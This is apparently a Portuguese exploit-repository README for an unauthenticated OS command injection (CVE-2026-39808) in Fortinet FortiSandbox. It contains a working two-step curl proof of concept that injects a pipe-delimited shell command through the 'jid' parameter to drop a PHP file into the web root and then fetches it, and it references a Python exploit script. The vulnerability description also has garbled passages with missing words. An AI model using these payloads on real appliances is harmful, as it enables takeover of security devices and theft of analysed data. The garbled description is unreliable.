
Fortinet FortiSandbox 4.4.0-4.4.8 - Injeção de Comandos do SO via Endpoint tracer-behavior
Fortinet FortiSandbox 4.4.0-4.4.8 - Injeção de Comandos do SO via Endpoint tracer-behavior
Fortinet FortiSandbox é uma solução avançada de proteção contra ameaças que cria ambientes isolados para analisar arquivos, URLs e tráfego de rede suspeitos em busca de comportamento malicioso. Ela usa uma combinação de análise estática, análise dinâmica, aprendizado de máquina baseado em IA e inteligência de ameaças do FortiGuard para detectar ameaças de dia zero, malware evasivo, ransomware e ataques direcionados que burlam as defesas tradicionais baseadas em assinaturas. As empresas devem implantar o FortiSandbox para se proteger contra ameaças emergentes — especialmente malware desconhecido e ameaças persistentes avançadas (APTs); detonando automaticamente conteúdo suspeito em um ambiente seguro e isolado antes que ele atinja os sistemas de produção. Ele se integra com o Fortinet Security Fabric mais amplo e pode ser implantado como um dispositivo físico, máquina virtual, serviço em nuvem ou solução conteinerizada para se adequar a diversas arquiteturas de rede.
CVE-2026-39808 é uma vulnerabilidade crítica de que afeta as versões a do FortiSandbox. A falha decorre da neutralização inadequada de elementos especiais na entrada controlada pelo usuário antes de ser usada na construção de comandos do SO (CWE-78), afetando especificamente um endpoint de API não especificado. Um atacante não autenticado pode explorar essa vulnerabilidade enviando requisições HTTP especialmente criadas para executar com no sistema subjacente. A exploração bem-sucedida concede ao atacante controle completo sobre o dispositivo , permitindo acessar amostras de malware analisadas, exfiltrar dados de configuração sensíveis, realizar pivô para segmentos de rede conectados ou usar o dispositivo comprometido como ponto de apoio para movimentação lateral adicional dentro do ambiente corporativo. Esta vulnerabilidade está sendo ativamente explorada na natureza.
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
"http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Connection: close"
python CVE-2026-39808-X7.py
Este repositório e seu conteúdo são fornecidos estritamente para pesquisa legítima de segurança, testes de penetração autorizados, estudo educacional e fins defensivos. Ao acessar ou usar este material, você assume total responsabilidade por garantir que suas atividades estejam em conformidade com todas as leis aplicáveis e que obteve a devida autorização antes de testar ou aplicar essas técnicas em qualquer sistema que não seja de sua propriedade.
Os autores e mantenedores deste projeto não assumem qualquer responsabilidade por danos, consequências legais ou uso indevido resultante da aplicação destas informações. Qualquer uso para acesso não autorizado, atividade maliciosa ou fins ilegais é expressamente proibido e não suportado.
Use com responsabilidade. Mantenha-se dentro da lei. Teste apenas o que você possui ou tem permissão explícita por escrito para testar.
SCT-PL